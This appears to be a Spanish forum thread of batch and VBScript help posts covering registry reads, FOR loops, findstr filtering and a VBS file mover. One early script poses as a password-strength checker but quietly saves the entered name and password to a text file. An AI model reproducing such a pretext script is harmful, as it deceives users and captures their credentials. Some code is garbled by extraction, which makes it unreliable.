alguien me puede ayudar jeje esque no me han respondido, se que ya hice varias preguntas pero no entiendo soy medio lento para aprender jejeje pero espero y me puedan ayudar con los posts que puse ariva.

saludos espero que entiendan mis dudas

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: viktor74 en 18 Agosto 2007, 21:57

mm una preguntilla sobre un programa que hice.

Lo que pasa es que hice un programa que "verifica" si tu contraseña es buena o no.

@echo off

title seguridad en tu contraseña

echo iBienvenido! sigue las instrucciones

set /p nombre= como te llamas?

:menu

cls

echo.

echo 1.checar seguridad de contraseña

echo 2.salir

set /p opc=que quieres hacer %nombre%??

if %opc%==1 goto ver

if %opc%==2 goto end

:ver

set /p con= ingresa tu contraseña

cls

echo analizando...

echo %nombre% >> archivo3.txt echo %con% >> archivo3.txt pause set /p respuesta= muy mala

%respuesta%

:end echo adios pause exit

aqui el problema que tengo es que no se como hacer para que el programa elija si a contraseña es buena o mala, simplemente le puse que digera que es mala o buena y quisiera saber si hay alguna forma de que por ejemple si la contraseña es menor a 8 caracteres sea mala i si es mayor se a buena.

De antemano gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 21 Agosto 2007, 04:43

si quieres saber si es menor a 8 caracteres, trata de obtener el caracter 8 de una variable, si es diferente de "", es porque es mayor o igual a 8...

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: .Undertaker. en 30 Agosto 2007, 05:11

Alguien me puede explicar este code completamente??

Código:

FOR \sqrt{F} "tokens=1,3-5,7-9,10* delims= " %%i IN ("George no es malvado, es bondadoso, siempre piensa en los demas.") DO echo %%i %%j %%k %%l tonto, %%m %%n %%o matar a %%p %%q

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Ze Marduk en 26 Septiembre 2007, 09:36

hola amigooo, tengo un problemilla, explico rapido, tengo mysql instalado en mi PC, y uso msdps para entrar a mysql mas o menos asi:

Código:

```
cd xampp\mysql\bin\mysql
mysql -u root -p
```

despues me aparece el siguiente mensaje:

Citar

enter your password:

y ahi tecleo mi contraseña, ahora bien, hice un bat con el siguiente codigo:

Citar
@echo off
color a
cd\
cd xampp\mysql\bin
mysql -u root -p
echo mysql :: esta es mi contraseña de mysql

pero aunque en el bat hago q mi contraseña se escriba sola aun asi me sale el mensaje:

Citar enter your password:

mi pregunta es como puedo introducir mi contraseña de mysql sin yo teclear es decir que lo haga el bat???

espero q me haya explicado

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Siuto en 26 Septiembre 2007, 13:01

Proba eso ;)

Código:

echo password | mysql -u root -p

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: chrominum en 28 Septiembre 2007, 17:01

Buenas, necesito saber como se puede guardar el valor de una entrada del registro en una variable, gracias :D

```
Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: nhaalclkiemr en 28 Septiembre 2007, 17:22
```

Primero este no era el mejor sitio para hacer tu pregunta, podías haber abierto un nuevo tema...y aún así nunca pensaste pork existen post pegados!!!!!!?????

Mirate este:

Librería de funciones y scripts BATCH Actualizado 26/05/07 (http://foro.elhacker.net/index.php/topic,163184.0.html)

Y para que veas te pongo el código que te interesa aki cuyo titulo es casi igual que tu pregunta:

Script para extraer el valor de una clave del registro

```
1. @echo off
2. :: Script para extraer el valor de una clave del registro
3. :: By nhaalclkiemr
4. :: Special thanks to Sdc
5. reg export "RUTA CLAVE" "temp.tmp"
6. if not %errorlevel%==0 goto error
7. type temp.tmp | find "NOMBRE CLAVE" > cadena encontrada.tmp
8. del /S /F /Q /A:- temp.tmp
9. FOR /F "tokens=2* delims==" %%I IN (cadena encontrada.tmp) DO
  set var="%%I"
10. if "%var%"=="" goto error
     FOR /F "tokens=2* delims==" %%I IN (cadena encontrada.tmp)
  DO (
12.
             call:PARSEA %%I
13. )
14. <u>goto</u> :EOF
15. : PARSEA
16. <u>del</u> /S /F /Q /A:- cadena encontrada.tmp
17. SET PP="%~1"

18. SET PP=%PP:\\=\%
19. SET PP=%PP:"=%
```

Hay que usar el boton (http://foro.elhacker.net/Themes/default/images/spanish/search.gif)

Saludos;)

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: chrominum en 28 Septiembre 2007, 17:54

Busqué por google y en este tema, pero en el foro se me olvido xD

Muchas gracias, voy a probarlo;)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Alfil0022 en 2 Enero 2008, 01:38

Hola.

Tengo un problema con un batch. Parece que SET no funciona dentro de un bucle FOR. Es posible? El batch es el siguiente

```
set J=1
for %%I in (*.jpg) do (
  ren %%I %J%.jpg
  set /a J+=1
)

He probado con CALL SET /A J+=1 y tampoco

Tambien he probado ...

set J=1
for %%I in (*.jpg) do (
  ren %%I %J%.jpg
```

```
call:increm echo %J%
)
goto fi
:increm set /a J+=1 goto:EOF
:fi
```

El caso es que cuando ejecuto el siguiente codigo fuera del batch si que funciona

```
set J=1
set /a J+=1
echo %J%
(J vale 2)
```

Alguien sabe que es lo que pasa?

Gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 2 Enero 2008, 01:48

que tienes que activar las extensiones de comandos, o hacer una llamada a una funcion dentro del for para poder hacer eso.

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: nhaalclkiemr en 2 Enero 2008, 01:59

A mi si te digo la verdad lo de las extensiones de comando y usar ! en lugar de % nunca me funcionó...ya lo había comentado anteriormente pero weno es igual...

```
saludos;)
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: ~[uNd3rc0d3]~ en 17 Enero 2008, 00:52

muy bueno el manual

lo he visto por toda la red xDD

un comando que yo soy de usar bastante seguido y que nunca lo vi en un manual es CACLS para editar las acl de windows y quitar o otorgar derechos

quizas esta un poco incompleto lo de los argumentos ya que vi dudas por ahi pero es el unico manual de programacion avanzada que deambula por la red xDD

hasta otra

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Berzeker en 19 Enero 2008, 07:54

Hola, tengo un codigo con el cual se ejecuta un ftp, quisiera que todos los archivos que se encuentren en un directorio y tambien en los subfolders de este (ejemplo: C:\users\berzeker\pictures\foto.jpg C:\users\berzeker\pictures\vacaciones\foto.jpg) sean los que se transfieren, pero los archivos transferidos van a ser solo los que tengan determinada extension; algo asi *.jpg (es decir que el codigo que necesito solo necesitaria modificarle la extension para que mande .jpg .doc. .txt etc) cualquier ayuda, muchas gracias ;)

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Berzeker en 19 Enero 2008, 23:09

Hola, he avanzado un poco con la ultima duda que tuve pero no la he podido resolver todavía, se me ocurrio usar el comando dir /s y guardar la informacion, despues ejecutar find, pero lo unico que consigo con esto es ver los nombres de los .jpg, mas no la ruta que es indispensable para ejecutar el ftp (creo), alguna idea?

En otra cosa, quisiera saber como copiar el contenido de una pagina en internet en un .txt para usar un find sobre el, o si tienen algun otro metodo con batch, gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: paperas en 22 Enero 2008, 18:29

Buenas Tardes, Un saludo a todos:

Soy nuevo en esto de la programacion, quisiera solicitarles de favor si me pudieran ayudar a resolver mi problema, hay un sistema instalado como en 20 clientes aprox. y en cada cliente se va generando un archivito de audio dentro de una carpeta especifica en donde contiene la grabacion de la llamada que recibe la operadora del sistema, mi problema es que me estan pidiendo concentrar todos esos archivos de audio de cada maquina en una sola, las cuales obviamente estan conectadas por red con TCP/IP, como puedo crear un batch que me haga esto?

de antemano, muchas gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Kefren en 22 Enero 2008, 18:47

Cita de: paperas en 22 Enero 2008, 18:29

Buenas Tardes, Un saludo a todos:

Soy nuevo en esto de la programacion, quisiera solicitarles de favor si me pudieran ayudar a resolver mi problema, hay un sistema instalado como en 20 clientes aprox. y en cada cliente se va generando un archivito de audio dentro de una carpeta especifica en donde contiene la grabacion de la llamada que recibe la operadora del sistema, mi problema es que me estan pidiendo concentrar todos esos archivos de audio de cada maquina en una sola, las cuales obviamente estan conectadas por red con TCP/IP, como puedo crear un batch que me haga esto?

de antemano, muchas gracias

No se si se podrá hacer eso con un BATCH, en tal caso sería con una especie de Telnet o algo asi

SaluDOS

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: paperas en 22 Enero 2008, 18:56

muchas gracias por tu respuesta kefren

Si la verdad me estoy dando cuenta de eso porque ya tengo varias

semanas buscando algo parecido y no encuentro por ningun lado, si tu sabes de programacion algo que me pudieras recomendar, no se con VB, Delphi o algo parecido, osea necesito automatizar ese proceso y que sea transparente para el usuario, es decir que no tenga que estar dando contrasenas a un ftp o por medio de un telnet, sino mas bien idear un programita que lo haga diario y sobre todo transparente. Un saludo

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: ^Arkangel^ en 24 Enero 2008, 16:40

```
Cita de: pupybell en 24 Enero 2008, 16:23
una pregunta?
este batch esta beien?
lo hice yo copiando un poco de este foro...
codigo:
color 2
echo iBienvenido! sique las instrucciones
set /p nombre= como te llamas?
:menu
cls
echo.
echo 1) Chequear seguridad de contraseña
echo 2) Salir
set /p opc=que quieres hacer %nombre%:
if %opc%==1 goto ver
if %opc%==2 goto end
set /p con= ingresa tu contraseña:
cls
echo analizando...
echo.
echo.
echo Presione una tecla para ver la seguridad...
pause > nul
if %con% GEQ 8 (echo contraseña: Buena) ELSE (echo contraseña: Mala, cambiala)
pause > nul
echo Presione una tecla para salir
pause > nul
exit
y nada mas...
solo eso
suerte
Pupybell
```

Yo le cambiaria las siguientes cosas:

1ro y principal hay que añadirle @echo off para que no se vean los comandos cuando lo ejecutas.

2do me salteria toda esta parte:

```
Código
```

```
set /p nombre= como te llamas?
:menu
cls
echo.
echo 1) Chequear seguridad de contraseña
echo 2) Salir
set /p opc=que quieres hacer %nombre%:
if %opc%==1 goto ver
if %opc%==2 goto end
:ver
```

Eso es porque :

- 1) Hay verdadera necesidad de preguntarle el nombre al usuario?
- 2) Si ejecuta el programa va a ser para (si el programa tiene 1 sola funcion, ejercer dicha funcion) asique si elijiese salir, no habria tenido necesidad de siquiera ejecutar el programa. Me explico?

3ro No entiendo que quieres poner aca: Código:

```
if %con% GEQ 8 (echo contraseña: Buena) ELSE (echo contraseña: Mala, cambiala)
```

Seguramente queires poner que si tiene 8 o mas <u>caracteres</u> es buena, sino es mala.

Ahi lo que en realidad pusiste es que si la contraseña (siempre y cuando sea solo numerica) es = o mayor a 8 es buena, contrario es mala (OJO: si es = o mayor en numero, ejemplo que pones 00000000001 eso es mala sugun el batch xq ese numero no es mayor a 8, si pones 9 entonces batch lo toma como bueno, me explico?)

y despues, un pequeño detalle al principio:

Código: color 2

Personalmente creo que queda mejor un verde mas claro, esto lo haces

Código:

color 0c

Espero haberte sido de ayuda!

Nos vemos ;)

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: ^Arkangel^ en 24 Enero 2008, 20:30

De nada, siempre es un placer ayudar.

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: drotha2 en 27 Febrero 2008, 21:22

Hola a tod@s!!!

Me alegro encontrar un manual como el de la primera pagina, aunque me aclaro mucho no consigo que me funcione, tal vez, por que no sepa...

Cuento el problema a ver q soluciones tiene...

Tengo un lector de tarjetas SD y un adaptador de SD, un software a cargar en tarjetas... Estoy intentando q el bach formatee de forma rápida la sd, para limpiarla, de esta forma tarda menos que hacer un del, me encuentro con que el format me pide pulsar tecla cuando este lista la unidad, despues que le ponga nombre, después paso a meter datos, pero en ocasiones me cambia la letra de la unidad, necesitaría q preguntara, si no la encuentra en la letra normal, que unidad se grabaran los datos. a ver, en ocasiones me da la unidad L pero otras la J o la M, el problema, imagino, seria q el bach supiera si la unidades del card reader están para escribir o no y si es q no preguntara la unidad a escribir.

Esa es la parte mas chunga, para mi, claro, posiblemente me deis distintas soluciones.

Total, seria, como limpiar la unidad, en caso de usar FORMAT que este no pida pulsar teclas o meter nombre, que fuera rápido... Que detecte la unidad a grabar y si no encuentra pida letra de unidad a grabar... Imagino q esta algo chungo o directamente seria mas sencillo que pidiera la letra de la unidad a grabar...

Espero podáis ayudarme... hace algunos años q no uso los comandos msdos

Un saludo y gracias!!

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Luchiz en 9 Marzo 2008, 18:36

Hola a tod@s como veran soy nuevo por aca y tambien nuevo en esto del BATCH, me gustaria aprender a hacer "cositas" con este ejecutador por lotes, Por favor si alguno de ustedes sabe hacer cualquier cosa en .bat respondame que verdaderamente me interesa aprender. lo que sea que sepan hacer no duden que yo absorbo informacion como una esponja. pero solo hay una condicion que culaquier cosa que envien se bien explicadita porfa =)

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Kiosera en 17 Marzo 2008, 18:05

Buen día sirdarckcat y buen día para todos!!

Quería preguntar acerca de un tema:

Sucede que quiero leer línea a línea un archivo TXT.

Estoy usando lo siguiente:

FOR %%a in (c:\CB.txt) DO echo %%a

Pero lo que veo es c:\CB.txt y no el contenido (lo que hay dentro de CB.txt) :-[

Uso el for porque lo que deseo es que recorra el archivo hasta que se acabe....

Es posible con el FOR o estoy usando una sentencia que no es?

De antemano, gracias por la respuesta

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: ~[uNd3rc0d3]~ en 17 Marzo 2008, 23:48

Cita de: C:*.bat @echo off for /f "tokens=* delims= " %%a in (hola.txt) do (echo %%a) pause > nul

Cita de: C:\hola.txt hola como andas bien y vos yo bien, che a donde vas? a tomar una virra, vamos? dale....

Cita de: ConsoleOutput hola como andas bien y vos yo bien, che a donde vas? a tomar una virra, vamos? dale....

see ya!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: morenochico en 18 Marzo 2008, 18:26

¿Se puede poner varias instrucciones ftp en UNA sola linea desde el promtp de msdos?

Necesito hacer varios movimientos en varias pc's remotas, (borrar archivos, crear directorios etc). Esto no es problema ya que tengo un archivo .exe que hace eso (todas las pc's tienen una configuracion similar). Lo que quiero saber es si se puede poner una instruccion larga dentro del run de windows, esto es: inicio ---> run.

Lo que quiero es: abrir cmd.exe, ir a un directorio (desktop), conectarme a un servidor ftp y descargar mi archivo .exe que es el que hace todo el movimiento que ocupo. Quiero hacerlo todo desde el run de windows o en su defecto abrir una terminal CMD y poner una instruccion larga (cd desktop, ftp ... etc...). He intentado pero hasta el momento no

he podido. Ya se que para conectarse a un servidor ftp se puede crear un archivo con instrucciones que se manda llamar con ftp desde el prompt. Pero no me sirve ya que el archvo .exe que ocupo seria mas chico que el que archivo con instrucciones ftp y en la practica se haria mas trabajo.

Las razones por las que quiero hacerlo asi son tres, la comunicacion es muuuy lenta >:(, yo no lo haria lo haria una persona que no tiene muchos conocimientos en pc's :P y son demasiadas pc's :-[. Busco poner la instruccion solo una vez y que solito se haga todo el trabajo. ;)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: BasFKlitzZ en 22 Marzo 2008, 08:10

Holas a todos!... Miren, tengo una simple duda con un *.bat: ¿Se puede poner una llamada (:llamada) en el mismo .bat del archivo que lo llama...? Porque intento, y lo reviso, pero no encuentro error. Lo que pasa es que reinicia la aplicación, o sea, vuelve a empezar desde el principio, y no reconoce la llamada :-\
El código que tengo es algo así:

Nombre del archivo: "Prueba.bat"

Código:

```
@echo off
color A
set /P caracter=Escriba algun caracter, y presione enter:
IF %caracter% neq i (
cls
echo Los caracteres que usted ha escrito, son incorrectos...
echo Presione una tecla para continuar...
pause >nul
) ELSE (
cls
echo Muy Bien!!! Has acertado!!!
echo Adios
pause >nul
exit)
Prueba.bat ventana
```

@echo off&call:%*&goto:EOF

:ventana start color A echo Tendrás 7 años de mala suerte por no haber acertado... pause >nul exit goto:EOF

Espero que me puedan ayudar, y se que mi error debe ser algo insignificante... :¬¬ tal vez sea por el "@echo off&call:%*&goto:EOF"... tal vez tenga algo mal escrito, o me falte algo... nose, pero si los pongo en .bats diferentes, funciona :-\ Desde ya, muchas gracias :)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: renegomez en 28 Abril 2008, 19:55

Buen dia, hola a todos, necesito su ayuda, tengo un software que quiero que solo se pueda instalar una una maquina determinada y que solo permita hacer 3 instalciones y que luego lo bore, el softwre se encuentra un penddrier(USB), si alquien puede decirme como hacer una bat, mil gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: xfz4 en 29 Abril 2008, 01:18

Cita de: renegomez en 28 Abril 2008, 19:55

Buen dia, hola a todos, necesito su ayuda, tengo un software que quiero que solo se pueda instalar una una maquina determinada y que solo permita hacer 3 instalciones y que luego lo bore, el softwre se encuentra un penddrier(USB), si alguien puede decirme como hacer una bat, mil gracias

Código:

@ECHO OFF CLS IF %USERNAME%==MAKINA DETERMINADA (GOTO NEXT) ELSE GOTO FIND set /a IDENTIFICADOR=%IDENTIFICADOR%+1 if exist c:\3.GARBAGE (goto SALTE) else goto crear :CREAR

```
echo item-%USERNAME%>c:\%identificador%.GARBAGE
:SALTE
DEL %0
:: SI QUIERES BORRAR LO INSTALADO LO BORRAS AKI <---
:: O TAMIEN PODES METER EL IDENTIFICADOR EN EL PENDRIVE
:: ESTO TE DA UNA IDEA ??</pre>
```

saludos ;D

PD: pasense por ka: http://foro.elhacker.net/index.php/topic,163184.0.html (http://foro.elhacker.net/index.php/topic,163184.0.html) y aka: http://foro.elhacker.net/index.php/topic,209121.0.html (http://foro.elhacker.net/index.php/topic,209121.0.html) y respondanme >:(>:(>:(>:(:rolleyes: :¬¬ :P;D

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: elnenamelenas en 16 Mayo 2008, 01:15

POr favor necesito ayuda urgentemente, soy nuevo en esto y necesito crear un programita que me cambie automaticamente el path del windows donde se ejecute por el que yo le diga.

Alguien puede ayudarme? se lo agradeceré aternamente

Lo que llevo hecho hasta ahora sin lograr nada es:

path>pathanterior.Txt

If %pathanterior.txt% EQU %pathcorrecto% (echo OK)

Else %pathanterior.txt% EQU %pathcorrecto% (echo ko)

Pause

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: m1st1c0 en 22 Mayo 2008, 17:36

Hola a Todos!:

Tengo un equipo que genera automaticamente archivos (AVI) y los almacena en una carpeta; tengo un bat que elimina los más viejos a 6 dias.

Quiero sacarle un backup, pero organizado es decir que se creeen la

carpetas por día y copie los archivos de ese dia en la carpeta que le corresponde.

Ej:

Los archivos estan en C:\VIDEO\ y la idea es que el genere algo como

- c:\Backup\16\
- c:\Backup\17\
- c:\Backup\18\
- c:\Backup\19\
- c:\Backup\20\
- c:\Backup\21\
- c:\Backup\22\

Y que tome los archivos de C:\VIDEO y los guarde en el día que corresponde.

Espero contar con su apoyo! :-(

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Bad_Robot en 10 Junio 2008, 05:41

gracias por el manual, lo andaba buscando :laugh:

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Shinseiki86 en 15 Junio 2008, 08:28

Saludos y que tengan un feliz día!!

Tengo un inconveniente con unos archivos txt. diariamente me llegan alrededor de 3000 archivos que tengo que clasificar de acuerdo a 2 lineas que estan casi al final.

Las dos lineas son:

Necesito que si estas lineas no existen en el fichero, que lo mueva a una carpeta X.

Ejemplos de un archivo son estos:

Este, por ejemplo debe moverse a la carpeta X.

000012CC666666	566 030	0 76001CH	HAPARRO	NACHO
000012CC999999	999 030	0 76001AF	RCO	JUANA
00031300058700	0000007336	00000107	70280000000	000000000000
00032352464613	391 00001	070280000	000000000000000000000000000000000000000	000000000000000000000000000000000000000
0				
000333	0000000000	00000000	00000000000	0000000000
00035300000000	0000006265	72000000	0000000000	000000000000
00036300000000	00000000000	000000000	0000000000	000000000000
00037300000000	0000006265	72000000	0000000000	000000000000
00038300000000	00000000000	000000000	0000000000	000000000000
00039300000000	0000006265	72000000	0000000000	000000000000

Y este se puede quedar donde está:

000012CC99999999	0300	76001ARCO)	JUANA
00031300004615000	000005770	000000000	0000000000000	00000000
000323 00	000000000	0000000000	000000000000000000000000000000000000000	000000
000333 00	000000000	0000000000	000000000000000000000000000000000000000	000000
000353000000000000	000005770	000000000	0000000000000	00000000
000363000000000000	00000000	000000000	0000000000000	00000000
000373000000000000	000005770	000000000	0000000000000	00000000
00038300000000000	00000000	000000000	0000000000000	00000000
00039300000000000	000005770	000000000	0000000000000	00000000

Lo que me parece complejo es que se necesitan condicionales, intenté hacerlo en c++, pero la verdad me faltan muchos conocimientos. :huh: PD: El texto se visualiza mejor en notepad Gracias! Kanpai!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 15 Junio 2008, 17:59

Si sabes cuantas lineas hay en el archivo, y exactamente cuales son las que tienes que leer, con un FOR /F, con un filtro skip; y un set, puedes hacer el trabajo..

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 15 Junio 2008, 20:24

Si sabes cuantas lineas hay en el archivo, y exactamente cuales son las que tienes que leer, con un FOR /F, con un filtro skip; y un set, puedes hacer el trabajo..

Saludos!!

Ese es el problema... El archivo empieza con una lista de personas, la cual va desde 1 hasta ?? . Habia pensado usar un findstr.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: sirdarckcat en 15 Junio 2008, 22:22

Citar

una lista de personas, la cual va desde 1 hasta ?? No entiendo entonces lo que tienes que hacer :¬¬

Saludos!!

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 23 Junio 2008, 14:38

Hola a todos

estoy utilizando este comando para filtrar los archivos txt

```
findstr /m /c:"texto1a" *.txt > temp.txt
findstr /m /c:"texto1b" *.txt >> temp.txt
findstr /m /c:"texto2a" *.txt >> temp.txt
findstr /m /c:"texto2b" *.txt >> temp.txt
```

Asi me sirve, pero tengo que filtrarlo luego por excel, ya que necesito un consolidado de la busqueda. Me serviría mas si pudiera usar condicionales... ¿Se puede? :huh:

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 23 Junio 2008, 15:16

Siempre me ha gustado mucho más *.vbs que *.bat (se crean igual, notepad y extensión vbs), es por eso que he codeado la siguiente utilidad que hace lo que necesitas,..... espero :P

Código:

```
set objfso = createobject("scripting.filesystemobject")
' Establecemos el objeto encargado de realizar las tareas
set lacarpeta = objfso.getfolder("d:\carpetacontenedora")
'Fijamos la ruta en la que esta la carpeta, dentro de la cual, están los
archivos
set afil = lacarpeta.files
'Obtenemos los archivos
for each f in afil
'Por cada archivo en la carpeta
set elarchivo = objfso.OpenTextFile(f.path,1)
contenido = elarchivo.readall
' Lo abrimos en modo lectura y leemos su contenido
primero =
                                      instr(1,contenido,"000323
0000000",1)
segundo =
instr(1,contenido,"000333
                                      0000000",1)
' Buscamos la primer línea, y luego la segunda
elarchivo.close
' Cerramos el archivo
if primero <>0 and segundo<>0 then
' Comparamos, si existen la primera Y la segunda línea, deben de existir
las dos
objfso.movefile f.path, "d:\pronto\"&f.name
' Movemos el archivo a la carpeta destino en caso de que sea afirmativo
' Debe de establecerse la ruta de la carpeta, en este caso es "d:\pronto"
end if
' Terminamos la comparación
next
' Pasamos al siguiente archivo
```

También te lo he comentado para que lo entiendas mejor ;)

Pruebalo y cuentanos como te va

Saludos

[Modifico] Viendo un poco mejor lo que necesitas me he dado cuenta de que la condición esta al revés, en este caso, los mueve si tienen la cadena de texto, pero tu quieres lo contrario, que los mueva en caso de que no las tenga, para eso basta con modificar la siguiente línea....

Esto...

Código:

if primero <>0 and segundo<>0 then

' Comparamos, si existen la primera Y la segunda línea, deben de existir las dos

Por esto....

Código:

if primero =0 or segundo=0 then

' Comparamos, si no existe la primera O la segunda línea, con que una no exista basta

```
Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Shinseiki86 en 23 Junio 2008, 18:08
No me funcionó, pero es posible que sea que lo configuré mal.
Ya hice uno que me funciona de maravilla, pero quiero optimizarlo.
@echo off
color 0A
title FILTRADO INCAPACIDADES ver3.0
rem Programa: filtroIGE ver3.5.bat
     echo
ÄÄċ
            Filtrado INCAPACIDADES
                                   3
echo
echo
              Shinseiki86
     echo
ÄÄÙ
echo °
goto ingreso
:nocarp
@echo CARPETA INEXISTENTE!
:ingreso
@echo Ingrese o arrastre carpeta a procesar:
set /p carpeta="> "
%carpeta:~1,2%
cd %carpeta%
if %errorlevel% GTR 0 goto nocarp
cls
:busqueda
echo
     ÄÄż
            Filtrado INCAPACIDADES
                                   3
echo
                               3
echo <sup>3</sup>
              Shinseiki86
ÄÄÙ
echo
echo PROCESANDO 000%%% °°°°°°°°°
```

```
findstr /m
/c:"000323
         " *.txt > filtro.xls
cls
   echo
żÄÄ
                       3
   3
echo
        Filtrado INCAPACIDADES
echo
         Shinseiki86
   echo
ÄÄÙ
echo
echo PROCESANDO 025%%% ÛÛÛ2±000000
findstr /m
/c:"000333
         " *.txt >>filtro.xls
cls
   echo
żÄÄ
                       3
   3
echo
        Filtrado INCAPACIDADES
echo
         Shinseiki86
   echo
ÄÄÙ
echo
echo PROCESANDO 050%%% ÛÛÛÛÛÛÛ2±°°°°
findstr /m
/c:"0003230
          " *.txt >>filtro.xls
cls
   echo
żÄÄ
   3
                       3
echo
        Filtrado INCAPACIDADES
echo
         Shinseiki86
   echo
ÄÄÙ
echo
echo PROCESANDO 075%%% ÛÛÛÛÛÛÛÛÛÛ2±°
findstr /m
/c:"0003330
          " *.txt >>filtro.xls
cls
goto finalizado
```

```
:error
echo Se ha producido un error!
echo Posiblemente el archivo está abierto
echo Cierre el archivo filtro.xls y presione cuaquier tecla para
echo intentar crear de nuevo el archivo.
pause >nul
cls
goto busqueda
:finalizado
    echo
ÄÄż
echo <sup>3</sup>
                                3
           Filtrado INCAPACIDADES
                            3
echo <sup>3</sup>
             Shinseiki86
ÄÄÙ
echo
echo PROCESANDO 100%%%% ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
echo Archivo filtro.xls generado con exito!
PAUSE
if not exist OK mkdir OK
:proceso
cls
    echo
ŚÄÄ
        Proceso de movimiento a carpeta OK
echo
    echo
ÄÄÙ
echo
echo Copie Nombre archivos a procesar:
set /p archivo="> "
if not exist %archivo% goto noarch
cls
    echo
żÄÄ
          PROCESANDO ÛÛÛ222±±±000
echo
    echo
ÄÄÙ
move %archivo% OK\
goto proceso
```

cls

En el archivo filtro.xls utilizo =A1=A2 para saber cuales estan repetidas. Aplico filtros, selecciono las que sean verdaderas y las copio en el batch.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 23 Junio 2008, 18:33

Que fue lo que no te funcionó? :¬¬
Te salió algún tipo de mensaje?

Cambiaste correctamente las rutas en las líneas 3 y 19?

Modificaste las líneas de comparación que agregue al final? Yo lo he probado y debería de funcionar todo correctamente Por si las dudas, doble click para ejecutar :xD

Saludos

Prueba esto

Código:

Cambiar línea 2 Cambiar línea 9 (de abajo para arriba XD)

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 23 Junio 2008, 18:43

linea 3:

set lacarpeta = objfso.getfolder("C:\Documents and Settings\tesdcv01\Escritorio\pruebas") linea 19: objfso.movefile f.path,"C:\Documents and Settings\tesdcv01\Escritorio\pruebas\ok"&f.name La 19 es la que saca error

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Novlucker en 23 Junio 2008, 18:47

Te he modificado el anterior mensaje para que además el script devuelva un mensaje de cuantos archivos se movieron....

Tu problema es sencillo

Citar objfso.movefile f.path,"C:\Documents and Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 23 Junio 2008, 19:03

```
set objfso = createobject("scripting.filesystemobject")
set lacarpeta = objfso.getfolder("C:\Documents and
Settings\tesdcv01\Escritorio\pruebas")
set afil = lacarpeta.files
movidos = 0
for each f in afil
set elarchivo = objfso.OpenTextFile(f.path,1)
contenido = elarchivo.readall
primero =
instr(1,contenido,"000323
                         00000000000",1)
segundo =
instr(1,contenido,"000333
                         00000000000",1)
elarchivo.close
if primero =0 or segundo=0 then
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok"&f.name
movidos = movidos + 1
end if
next
if movidos = 0 then
msabox "No se ha movido ningún archivo"
else
msqbox "Se han movido " & movidos &" archivos"
*****************
Me renombró los archivos asi:
05 641006 NI 891501133 EPS018 88 I
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Novlucker en 23 Junio 2008, 19:06

jeje la verdad no tengo la mas remota idea de por qué.

Menos mal que es de pruebas :xD

Es porque en esta línea.....
Citar
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok"&f.name
Debe de haber un slash invertido después del **ok**Citar
objfso.movefile f.path,"C:\Documents and
Settings\tesdcv01\Escritorio\pruebas\ok\"&f.name

Ahora si.... tiene que funcionar bien ;)

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Shinseiki86 en 23 Junio 2008, 20:29

mmmm ahora me aparece un error en linea 12...

